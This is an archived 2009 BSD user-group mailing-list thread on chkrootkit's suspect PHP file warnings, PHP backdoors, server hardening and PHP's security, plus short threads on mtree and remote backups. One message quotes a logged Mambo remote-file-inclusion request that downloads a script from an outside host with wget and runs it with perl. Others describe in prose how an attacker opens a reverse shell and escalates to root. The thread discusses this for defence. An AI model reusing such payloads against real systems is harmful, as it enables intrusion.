From max at neuropunks.org Mon Mar 2 10:18:56 2009 From: max at neuropunks.org (Max Gribov) Date: Mon, 02 Mar 2009 10:18:56 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: Message-ID: <49ABF8E0.7070604@neuropunks.org> Matt Juszczak wrote: > Evening all, > > Hi Matt, > In my latest chkrootkit reports (which I run nightly via periodic), I'm > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems, > after checking the code, that its really just searching for PHP files in > /tmp, and also searching for some other files throughout the system. > > I guess the question I have is - what's the point of this check? > /tmp is the default storage for uploaded files (before they get moved to their proper destination by some php code), and for php session data.. All of this is tunable through php.ini. There are plenty of php-based backdoor scripts which allow to execute shell commands, transfer files, look at your db, etc. One of such things, and seems to be really popular, is rst shell http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html I've seen that software used after a break in into some wordpress install, so maybe chkrootkit is checking for that. Lets hope it does a better job than just looking at .php files though - thats like assuming all binaries are viruses.. wow, this message is from feb 26.. time flies when you have fun.. > -Matt > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From akosela at andykosela.com Tue Mar 3 04:22:07 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 03 Mar 2009 10:22:07 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ABF8E0.7070604@neuropunks.org> References: <49ABF8E0.7070604@neuropunks.org> Message-ID: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Max Gribov wrote: > Matt Juszczak wrote: > > Evening all, > > > > > Hi Matt, > > > In my latest chkrootkit reports (which I run nightly via periodic), I'm > > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems, > > after checking the code, that its really just searching for PHP files in > > /tmp, and also searching for some other files throughout the system. > > > > I guess the question I have is - what's the point of this check? > > > > /tmp is the default storage for uploaded files (before they get moved to > their proper destination by some php code), and for php session data.. > All of this is tunable through php.ini. > > There are plenty of php-based backdoor scripts which allow to execute > shell commands, transfer files, look at your db, etc. > One of such things, and seems to be really popular, is rst shell > http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html Yes, /tmp is the favorite directory of all www script kiddies and other crackers. Mounting it noexec can help a little bit, but I also disable world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able to open a remote reverse shell. I really think that php websites nowadays are number one on the crackers' list. --Andy From bonsaime at gmail.com Tue Mar 3 09:50:17 2009 From: bonsaime at gmail.com (Jesse Callaway) Date: Tue, 3 Mar 2009 09:50:17 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote: > Max Gribov wrote: > >> Matt Juszczak wrote: >> > Evening all, >> > >> > >> Hi Matt, >> >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). ?It seems, >> > after checking the code, that its really just searching for PHP files in >> > /tmp, and also searching for some other files throughout the system. >> > >> > I guess the question I have is - what's the point of this check? >> > >> >> /tmp is the default storage for uploaded files (before they get moved to >> their proper destination by some php code), and for php session data.. >> All of this is tunable through php.ini. >> >> There are plenty of php-based backdoor scripts which allow to execute >> shell commands, transfer files, look at your db, etc. >> One of such things, and seems to be really popular, is rst shell >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html > > Yes, /tmp is the favorite directory of all www script kiddies and other > crackers. ?Mounting it noexec can help a little bit, but I also disable > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able Cool. How do you disable execution on those? I'm guessing the file permissions, but was hoping maybe you have some trick. > to open a remote reverse shell. ?I really think that php websites > nowadays are number one on the crackers' list. > > --Andy > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -jesse From carton at Ivy.NET Tue Mar 3 15:04:13 2009 From: carton at Ivy.NET (Miles Nordin) Date: Tue, 03 Mar 2009 15:04:13 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> (Andy Kosela's message of "Tue, 03 Mar 2009 10:22:07 +0100") References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: >>>>> "ak" == Andy Kosela writes: ak> php websites nowadays are number ak> one on the crackers' list. yeah, to my memory, PHP has been a security disaster since revision 1 in the late 90's. I'm not sure if it's the language itself, or the fact that it attracts idiots like Visual BASIC. I think it's the language itself. I think I'm becoming stupider by writing it. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From lists at zaunere.com Tue Mar 3 15:33:02 2009 From: lists at zaunere.com (Hans Zaunere) Date: Tue, 3 Mar 2009 15:33:02 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: <013b01c99c3f$400d5ca0$c02815e0$@com> > ak> php websites nowadays are number > ak> one on the crackers' list. > > yeah, to my memory, PHP has been a security disaster since revision 1 > in the late 90's. > > I'm not sure if it's the language itself, or the fact that it attracts > idiots like Visual BASIC. I think it's the language itself. I think > I'm becoming stupider by writing it. Sorry, I can't live with this one... http://www.nyphp.org/content/presentations/ Search for Coding secure There's also a corresponding article coming out in April that provides a lot more detail. H From akosela at andykosela.com Tue Mar 3 15:51:42 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 03 Mar 2009 21:51:42 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> Message-ID: <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> Jesse Callaway wrote: > On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote: > > Max Gribov wrote: > > > >> Matt Juszczak wrote: > >> > Evening all, > >> > > >> > > >> Hi Matt, > >> > >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm > >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). ?It seems, > >> > after checking the code, that its really just searching for PHP files in > >> > /tmp, and also searching for some other files throughout the system. > >> > > >> > I guess the question I have is - what's the point of this check? > >> > > >> > >> /tmp is the default storage for uploaded files (before they get moved to > >> their proper destination by some php code), and for php session data.. > >> All of this is tunable through php.ini. > >> > >> There are plenty of php-based backdoor scripts which allow to execute > >> shell commands, transfer files, look at your db, etc. > >> One of such things, and seems to be really popular, is rst shell > >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html > > > > Yes, /tmp is the favorite directory of all www script kiddies and other > > crackers. ?Mounting it noexec can help a little bit, but I also disable > > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able > > Cool. How do you disable execution on those? I'm guessing the file > permissions, but was hoping maybe you have some trick. > I use the simplest method which is chmod(1). You can also employ for that BSD MAC framework. The issue has been discussed recently on freebsd-security@ Of course, those security techniques won't really help you with the more sophisticated targeted attacks, but for the most part they help with the majority which are non-targeted automated script attacks. Consider this mambo abuse: 62.103.159.21 - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozill a/5.0" Those kind of attacks are real easy to deploy by automated bots that scan large number of ip's. They are non-targeted, but could be deadly as well. Most of them just use perl(1) (run as www user) to launch a remote shell and then execute some rootkit. By disabling execution of programs like perl(1) for the world, you definetly can stop those basic type of attacks. Even the simple changing of the default application path can help, as most of them use a simple http://host/application/ scheme. --Andy From akosela at andykosela.com Tue Mar 3 16:06:04 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 03 Mar 2009 22:06:04 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <013b01c99c3f$400d5ca0$c02815e0$@com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> Message-ID: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> "Hans Zaunere" wrote: > > ak> php websites nowadays are number > > ak> one on the crackers' list. > > > > yeah, to my memory, PHP has been a security disaster since revision 1 > > in the late 90's. > > > > I'm not sure if it's the language itself, or the fact that it attracts > > idiots like Visual BASIC. I think it's the language itself. I think > > I'm becoming stupider by writing it. > > Sorry, I can't live with this one... > > http://www.nyphp.org/content/presentations/ > > Search for Coding secure > > There's also a corresponding article coming out in April that provides a lot > more detail. > I don't want to speak for Miles here, but I think he meant that PHP is flawed by design, and not asking "how to write secure code". It is so easy to exploit PHP bugs, that even Visual BASIC "idiots" can do it. It has been increasingly harder to secure HTTP, as most of the successful break-ins are done with the help of PHP. And Miles remarked wisely that this trend has been going for years. --Andy From lists at zaunere.com Tue Mar 3 16:20:57 2009 From: lists at zaunere.com (Hans Zaunere) Date: Tue, 3 Mar 2009 16:20:57 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> Message-ID: <019201c99c45$f159f210$d40dd630$@com> > > http://www.nyphp.org/content/presentations/ > > > > Search for Coding secure > > > > There's also a corresponding article coming out in April that provides a lot > > more detail. > > I don't want to speak for Miles here, but I think he meant that PHP is Ok, but I'll respond to the below for now. > flawed by design, and not asking "how to write secure code". It is so Bluntly, if you don't consider them going hand in hand, there's a much bigger problem than PHP. Is C flawed because someone doesn't know how to check/prevent buffer overflows? Is Unix flawed because root let's you wipe out the hard disk? > easy to exploit PHP bugs, that even Visual BASIC "idiots" can do it. It > has been increasingly harder to secure HTTP, as most of the successful > break-ins are done with the help of PHP. And Miles remarked wisely Look through the presentation. The point is that it's not about the language - there's the developer, and most importantly, HTTP, which, if anything, is "flawed" from a security standpoint. Please consider the difference between HTTP and PHP. > this trend has been going for years. Web security? PHP security? Unfortunately, there hasn't been enough attention to either, that's the point. H From max at neuropunks.org Tue Mar 3 16:26:25 2009 From: max at neuropunks.org (Max Gribov) Date: Tue, 03 Mar 2009 16:26:25 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> Message-ID: <49ADA081.5030108@neuropunks.org> Andy Kosela wrote: > > I don't want to speak for Miles here, but I think he meant that PHP is > flawed by design, and not asking "how to write secure code". It is so > easy to exploit PHP bugs, that even Visual BASIC "idiots" can do it. it is equally easy to prevent them, just like in C you can count number of bytes in a string to prevent buffer overflows. > It > has been increasingly harder to secure HTTP, as most of the successful > break-ins are done with the help of PHP. i would change that to "web upload forms", "url bars in browsers" and "javascript injection" i bet you can find just as many vulnerable web apps written in other languages, and probably just as many backdoor apps in other languages as well. php has frameworks which handle plenty of security for you (read: input validation/sanitizing), and id argue that learning a framework from scratch is easier than a language from scratch.. > And Miles remarked wisely that > this trend has been going for years. > > --Andy > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > From bonsaime at gmail.com Tue Mar 3 16:45:41 2009 From: bonsaime at gmail.com (Jesse Callaway) Date: Tue, 3 Mar 2009 16:45:41 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> Message-ID: On Tue, Mar 3, 2009 at 3:51 PM, Andy Kosela wrote: > Jesse Callaway wrote: > >> On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote: >> > Max Gribov wrote: >> > >> >> Matt Juszczak wrote: >> >> > Evening all, >> >> > >> >> > >> >> Hi Matt, >> >> >> >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm >> >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). ?It seems, >> >> > after checking the code, that its really just searching for PHP files in >> >> > /tmp, and also searching for some other files throughout the system. >> >> > >> >> > I guess the question I have is - what's the point of this check? >> >> > >> >> >> >> /tmp is the default storage for uploaded files (before they get moved to >> >> their proper destination by some php code), and for php session data.. >> >> All of this is tunable through php.ini. >> >> >> >> There are plenty of php-based backdoor scripts which allow to execute >> >> shell commands, transfer files, look at your db, etc. >> >> One of such things, and seems to be really popular, is rst shell >> >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html >> > >> > Yes, /tmp is the favorite directory of all www script kiddies and other >> > crackers. ?Mounting it noexec can help a little bit, but I also disable >> > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able >> >> Cool. How do you disable execution on those? I'm guessing the file >> permissions, but was hoping maybe you have some trick. >> > > I use the simplest method which is chmod(1). ?You can also employ for > that BSD MAC framework. ?The issue has been discussed recently on > freebsd-security@ > > Of course, those security techniques won't really help you with the more > sophisticated targeted attacks, but for the most part they help with the > majority which are non-targeted automated script attacks. > > Consider this mambo abuse: > > 62.103.159.21 - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozill a/5.0" > > Those kind of attacks are real easy to deploy by automated bots that > scan large number of ip's. ?They are non-targeted, but could be deadly > as well. ?Most of them just use perl(1) (run as www user) to launch a > remote shell and then execute some rootkit. ?By disabling execution of > programs like perl(1) for the world, you definetly can stop those basic > type of attacks. ?Even the simple changing of the default application > path can help, as most of them use a simple http://host/application/ > scheme. > > --Andy > Darnit, I don't think I can disable www from running perl on about 1/2 of my servers... hack me please, i'm bored... but I can turn off wget access for sure. That one is used a lot. Good tip..thanks. From bcully at gmail.com Tue Mar 3 16:57:06 2009 From: bcully at gmail.com (Brian Cully) Date: Tue, 3 Mar 2009 16:57:06 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ADA081.5030108@neuropunks.org> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <49ADA081.5030108@neuropunks.org> Message-ID: On 3-Mar-2009, at 16:26, Max Gribov wrote: > Andy Kosela wrote: >> >> I don't want to speak for Miles here, but I think he meant that PHP >> is >> flawed by design, and not asking "how to write secure code". It is >> so >> easy to exploit PHP bugs, that even Visual BASIC "idiots" can do it. > it is equally easy to prevent them, just like in C you can count > number > of bytes in a string to prevent buffer overflows. Bullshit. It is much harder to prevent a million tiny errors than it is to exploit a single one of them. One good reason higher level languages are useful is that they cauterize this point of failure, making entire modes of failure impossible. This is a good thing in an insecure world - you're going to have enough issues dealing with the things the language can't help you with. >> It >> has been increasingly harder to secure HTTP, as most of the >> successful >> break-ins are done with the help of PHP. > i would change that to "web upload forms", "url bars in browsers" and > "javascript injection" > i bet you can find just as many vulnerable web apps written in other > languages, and probably just as many backdoor apps in other > languages as > well. Indeed. There are some strong cases to be made for Javascript being something of a security hole. There are a number of efforts to close those holes as well. There are very few people screaming that you should leave it alone because the security holes are fine. Admittedly, there are some important differences in their typical usage. Javascript lives in a much harsher landscape than PHP, so it's more important to lock it down. All that said, "mostly everything sucks anyway" is not much of an excuse for your particular pet to suck, although it may be a decent coping mechanism if you can't use anything better. > php has frameworks which handle plenty of security for you (read: > input > validation/sanitizing), and id argue that learning a framework from > scratch is easier than a language from scratch.. Believe it or not, sometimes the language itself imposes limitations on the amount of sanitization and validation you can do at the framework level. PHP has some of these issues (eval, calling functions by string reference, and so on). And please don't flaunt the red herring of "don't do that then."[1] I know I've argued this before, and I'll probably be doing it until I'm blue in the face, but just because two languages are Turing Complete doesn't mean that they are equivalent. It is useful to analyze and compare languages against each other in order to pick the most appropriate one for a job. It is therefore useful, when discussing web application security, to analyze languages and frameworks in terms of their ease or difficulty in maintaining security. Trying to drown out any critique of your favorite language by pointing out that there are others with similar problems, or that you can still accomplish your goals regardless of the feature set is ridiculous when the entire point of the exercise is to compare and contrast languages in a given context. The question is not "can I do it?" but "how easy is it?" -bjc [1] HTTP security got you down? Don't use HTTP! Problem solved! From matt at atopia.net Tue Mar 3 16:57:17 2009 From: matt at atopia.net (Matt Juszczak) Date: Tue, 3 Mar 2009 16:57:17 -0500 (EST) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> Message-ID: >> Those kind of attacks are real easy to deploy by automated bots that >> scan large number of ip's. ?They are non-targeted, but could be deadly >> as well. ?Most of them just use perl(1) (run as www user) to launch a >> remote shell and then execute some rootkit. ?By disabling execution of >> programs like perl(1) for the world, you definetly can stop those basic >> type of attacks. ?Even the simple changing of the default application >> path can help, as most of them use a simple http://host/application/ >> scheme. perl run as the www user... well, if its being run as the www user, not much they can do right? Not with the permissions of the www user, anyway. From carton at Ivy.NET Tue Mar 3 17:15:44 2009 From: carton at Ivy.NET (Miles Nordin) Date: Tue, 03 Mar 2009 17:15:44 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: Hans Zaunere's message of "Tue, 3 Mar 2009 16:20:57 -0500" References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <019201c99c45$f159f210$d40dd630$@com> <49ADA081.5030108@neuropunks.org> Message-ID: >>>>> "hz" == Hans Zaunere writes: >>>>> "mg" == Max Gribov writes: >>>>> "ak" == Andy Kosela writes: hz> Is C flawed because someone doesn't know how to check/prevent hz> buffer overflows? emphatically, YES. Now don't get contrary on me, Hans. Let's burn a few of these strawmans before the thread gets hot. Claiming something is ``flawed'' is not the same as claiming ``there is never a case to use it, ever.'' (disagree) However, saying ``there is a case to use it'' (agree) is not the same as saying ``they all have their strengths and weaknesses so it's a matter of choosing the right tool for the job, or of personal preference with no overall judgement possible.'' (disagree) hz> Is Unix flawed because root let's you wipe out the hard disk? That is not a security flaw. mg> i bet you can find just as many vulnerable web apps written in mg> other languages, National Vulnerability Database, 2008-09-20, notPHP: 9 records for Plone PHP: 145 Drupal, 259 Joomla!, 149 WordPress source: http://en.wikipedia.org/wiki/Plone_(software) :p I suspect you'll find the same in any other arena where PHP and non-PHP software are in competition. ak> PHP is flawed by design, and not asking "how to write ak> secure code". agree I am more interested in how to design environments where writing secure software is effortless. mysql_real_escape_string is just the very tip of a huge ``not effortless'' iceberg that explodes underwater into lack of type safety, no uniform installation environment, a proliferation of archaic and arcane config knobs that forcibly bleed across applications, version skew nightmares, bleeding global state, runtime parsing, and shell-script-type languages based on ``quoting'' and ``substitution'' in general---every time I see & bleeding into the rendered text on Facebook or \' rendering onto my screen in this shopping cart software, or website logins that won't take punctuation in passwords, I think PHP, you doomed piece of shit, you. I do not love you. I will NEVER love you. Even if you were clean I would not love you. ak> It is so easy to exploit PHP bugs, that even Visual BASIC ak> "idiots" can do it. aye, maybe so, but I didn't originally mean to call the exploiters idiots. I meant, are the PHP webapps habitually insecure because PHP is the low-entry-barrier language for people who spend no effort understanding the various merits to which a programming language can aspire, so all the worst programmers collect there, and these guys could not write a secure webapp in any language? and my current answer is, I don't think so, I think the problem is mostly PHP and that the same idiots would do much better work on another language. ak> Miles remarked wisely that ak> this trend has been going for years. yeah, and the full size and shape of the so-called ``web security'' trend may be new, like FX was pointing out lurking problems with Java webapps that like to ``serialize'' things, because you can feed a bitstream to the web server and have it explode into some arbitrarily complicated Object inside the web server J2EE VM. And you pointed out problems with super-convenient AJAX environments that encourage developers to forget the client VM is not trustworthy. new! But ``PHP is a pathologically-insecure piece of shit with such a mountain of documented incidents it's hardly worth discussing the `why' of the matter, just run, run away, from this awful Situation'' is certainly not new. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From max at neuropunks.org Tue Mar 3 17:26:28 2009 From: max at neuropunks.org (Max Gribov) Date: Tue, 03 Mar 2009 17:26:28 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> Message-ID: <49ADAE94.1020005@neuropunks.org> Matt Juszczak wrote: > > perl run as the www user... well, if its being run as the www user, > not much they can do right? Not with the permissions of the www user, > anyway. well, you can upload a local exploit, run it as www user, gain root and make it bind a shell or drop in some php backdoor or whatever.. Andy made a good point about using MAC, and also you can use something like tripwire to check your upload dirs/web application source/etc, but tripwire gets pretty tedious cause someone has to parse the input.. From akosela at andykosela.com Tue Mar 3 17:48:10 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 03 Mar 2009 23:48:10 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49ADAE94.1020005@neuropunks.org> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> Message-ID: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Max Gribov wrote: > Matt Juszczak wrote: > > > > perl run as the www user... well, if its being run as the www user, > > not much they can do right? Not with the permissions of the www user, > > anyway. > well, you can upload a local exploit, run it as www user, gain root and > make it bind a shell or drop in some php backdoor or whatever.. You can launch a passwordless remote shell on an arbitrary port (>1023) using perl(1) or nc(1) as www user, then reverse bind it to your local host bypassing any firewalls in between using ssh(1) and *then* gain root by so many techniques that it is not even worth it to write about them here. My point is that sh(1), ssh(1), wget (why not use fetch?), nc(1), cc(1), as(1), perl(1) are definetly methods of easy exploitation of your systems even by script bots. > > Andy made a good point about using MAC, and also you can use something > like tripwire to check your upload dirs/web application source/etc, but > tripwire gets pretty tedious cause someone has to parse the input.. Tripwire became a bloated beast nowadays. I'm using mtree(8) for checking files integrity and it is a very good tool for such job. --Andy From lists at zaunere.com Tue Mar 3 17:54:25 2009 From: lists at zaunere.com (Hans Zaunere) Date: Tue, 3 Mar 2009 17:54:25 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <019201c99c45$f159f210$d40dd630$@com> <49ADA081.5030108@neuropunks.org> Message-ID: <01d601c99c53$004dd810$00e98830$@com> > >>>>> "hz" == Hans Zaunere writes: ... Wow, this got complicated... > hz> Is C flawed because someone doesn't know how to check/prevent > hz> buffer overflows? > > emphatically, YES. Ok, we agree. H From thomas at zaph.org Tue Mar 3 18:54:22 2009 From: thomas at zaph.org (N. J. Thomas) Date: Tue, 3 Mar 2009 18:54:22 -0500 Subject: [nycbug-talk] mtree In-Reply-To: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: <20090303235422.GI37605@zaph.org> * Andy Kosela [2009-03-03 23:48:10+0000]: > > and also you can use something like tripwire to check your upload > > dirs/web application source/etc, but tripwire gets pretty tedious > > cause someone has to parse the input.. > > Tripwire became a bloated beast nowadays. I'm using mtree(8) for > checking files integrity and it is a very good tool for such job. Interesting, I use aide. It is a little old (the last release was in 2006, and IIRC it was dormant for a while before that), but it does the trick. If you're familiar with aide, how would you compare it with mtree? Thomas From raj at brainlink.com Tue Mar 3 18:43:27 2009 From: raj at brainlink.com (Raj Goel) Date: Tue, 3 Mar 2009 23:43:27 +0000 Subject: [nycbug-talk] Remote backup services Message-ID: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Guys, Has anyone figured out how to implement Mozy or Carbonite like backup services using FOSS tools? How would you backup linux, bsd, mac clients? Windows? Like the idea of wan-based backups, dislike trusting vendors that may cease to exist. Rajesh Goel, CISSP cell (917) 685-7731 CTO: Brainlink International, Inc. "IT Crisis Management and Solutions" From akosela at andykosela.com Wed Mar 4 07:39:34 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 04 Mar 2009 13:39:34 +0100 Subject: [nycbug-talk] mtree In-Reply-To: <20090303235422.GI37605@zaph.org> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <20090303235422.GI37605@zaph.org> Message-ID: <49ae7686.v2vZanwLUIA/w4wA%akosela@andykosela.com> "N. J. Thomas" wrote: > * Andy Kosela [2009-03-03 23:48:10+0000]: > > > and also you can use something like tripwire to check your upload > > > dirs/web application source/etc, but tripwire gets pretty tedious > > > cause someone has to parse the input.. > > > > Tripwire became a bloated beast nowadays. I'm using mtree(8) for > > checking files integrity and it is a very good tool for such job. > > Interesting, I use aide. It is a little old (the last release was in > 2006, and IIRC it was dormant for a while before that), but it does the > trick. > > If you're familiar with aide, how would you compare it with mtree? Aide is a good alternative to tripwire if you happen to have a mixed environment consisting of several UNIX flavors. It is the default integrity scanner for RHEL, but can run as well on FreeBSD, HP-UX, Solaris, AIX, you name it. I use mtree(8) because: * At the moment I'm using it for the hosts in public DMZ (and I have FreeBSD machines there only). * It is much simpler and straightforward than aide. I usually use the most simple program to do the job, and mtree(8) is already in the base system, and seems reasonably fast. Also I recommend you read 'man 7 security', section about 'Checking File Integrity' for some nice techniques to implement in this scenario. --Andy From skreuzer at exit2shell.com Wed Mar 4 09:05:40 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Wed, 4 Mar 2009 09:05:40 -0500 Subject: [nycbug-talk] Remote backup services In-Reply-To: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Message-ID: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > Guys, > > Has anyone figured out how to implement Mozy or Carbonite like > backup services using FOSS tools? > > How would you backup linux, bsd, mac clients? Windows? > > Like the idea of wan-based backups, dislike trusting vendors that > may cease to exist. Thats a pretty open ended question. How much infrastructure are you willing to put behind this? How reliable do you need it to be? How much money are you willing to spend? How many clients are you backing up? How much storage space do you need? -- Steven Kreuzer http://www.exit2shell.com/~skreuzer From george at ceetonetechnology.com Wed Mar 4 09:30:46 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 09:30:46 -0500 Subject: [nycbug-talk] Remote backup services In-Reply-To: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> Message-ID: <49AE9096.3080102@ceetonetechnology.com> Steven Kreuzer wrote: > On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > >> Guys, >> >> Has anyone figured out how to implement Mozy or Carbonite like >> backup services using FOSS tools? >> >> How would you backup linux, bsd, mac clients? Windows? >> >> Like the idea of wan-based backups, dislike trusting vendors that >> may cease to exist. > > Thats a pretty open ended question. > > How much infrastructure are you willing to put behind this? > How reliable do you need it to be? > How much money are you willing to spend? > How many clients are you backing up? > How much storage space do you need? The question that comes to my mind is whose infrastructure? Are you building this out yourself? If so, I assume you have some decent colocation somewhere remote. And with decent hardware to back it up. . . RAID, etc. And maybe multiple locations. If it's a clients infrastructure, 